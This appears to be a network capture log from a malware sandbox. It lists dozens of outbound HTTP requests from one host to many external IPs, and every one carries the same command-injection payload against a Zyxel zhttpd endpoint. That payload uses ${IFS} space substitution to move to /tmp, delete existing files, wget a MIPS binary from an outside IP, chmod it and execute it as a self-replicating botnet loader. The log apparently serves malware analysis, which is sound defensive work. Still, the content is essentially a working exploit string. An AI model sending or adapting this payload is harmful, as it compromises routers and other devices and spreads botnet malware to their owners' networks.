                                                        Feb 2, 2024 06:21:26.253530025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8413192.168.2.145783813.165.7.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253566027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8414192.168.2.1451364146.64.60.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253644943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8415192.168.2.1434434178.236.192.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253669024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8416192.168.2.145827290.208.141.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253721952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8417192.168.2.1446200129.4.223.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253770113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8418192.168.2.1435962101.146.137.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253823996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8419192.168.2.1438972205.202.224.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253873110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8420192.168.2.1437018121.83.208.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253899097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8421192.168.2.145430037.89.184.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253932953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8422192.168.2.1446792142.4.135.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253998041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8423192.168.2.1434238117.131.164.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254030943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8424192.168.2.1453248148.151.215.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254071951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8425192.168.2.1440022100.151.58.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254126072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8426192.168.2.144647031.140.18.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254160881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8427192.168.2.1437874165.23.31.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254209042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8428192.168.2.144942492.132.35.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254256010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8429192.168.2.1451506138.34.61.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254277945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8430192.168.2.1434542138.167.11.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254319906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8431192.168.2.1446828120.203.98.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254360914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8432192.168.2.144820838.101.167.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254399061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8433192.168.2.1438354193.156.254.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254443884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8434192.168.2.144007476.242.40.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254492044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8435192.168.2.1440782206.244.185.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254528999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8436192.168.2.1446486173.183.50.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254574060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8437192.168.2.145059653.26.189.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254631996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8438192.168.2.1442378134.14.121.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254647017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8439192.168.2.1449068198.25.226.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254690886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8440192.168.2.143460878.37.65.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254736900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8441192.168.2.1432924170.140.174.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254781961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8442192.168.2.1441922199.92.156.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254828930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8443192.168.2.1459970124.12.95.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254859924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8444192.168.2.144427047.26.163.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254911900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8445192.168.2.1456206223.0.135.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254947901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8446192.168.2.145244267.113.25.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.254995108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8447192.168.2.14399324.104.163.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255053043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8448192.168.2.1441466183.30.242.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255089045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8449192.168.2.1432904111.177.53.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255139112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8450192.168.2.143915846.188.124.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255161047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8451192.168.2.1437802130.0.242.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255189896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8452192.168.2.1439230175.160.128.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255253077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8453192.168.2.145720842.210.115.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255297899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8454192.168.2.145954875.173.157.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255343914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8455192.168.2.1441074223.156.89.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255367994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8456192.168.2.145159837.77.59.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255425930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8457192.168.2.1447498102.172.74.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255485058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8458192.168.2.1446668153.216.6.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255506039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8459192.168.2.1450642140.112.243.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255542040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8460192.168.2.145097642.89.101.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255595922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8461192.168.2.1433164172.223.248.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255644083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8462192.168.2.1455308175.187.129.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255692959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8463192.168.2.1445416119.192.46.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255721092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8464192.168.2.1446340163.200.235.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255764961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8465192.168.2.1447508137.29.163.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255799055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8466192.168.2.144774457.67.171.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255852938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8467192.168.2.145738671.19.60.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255909920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8468192.168.2.1445314137.180.208.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.255937099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8469192.168.2.144242627.146.98.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256016016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8470192.168.2.1451028133.119.61.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256047010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8471192.168.2.144589248.180.218.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256079912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8472192.168.2.1436822106.140.140.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256141901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8473192.168.2.144284464.232.138.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256170988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8474192.168.2.1460414141.8.105.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256225109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8475192.168.2.1457172123.82.45.18443
                                                        TimestampBytes transferredDirectionData
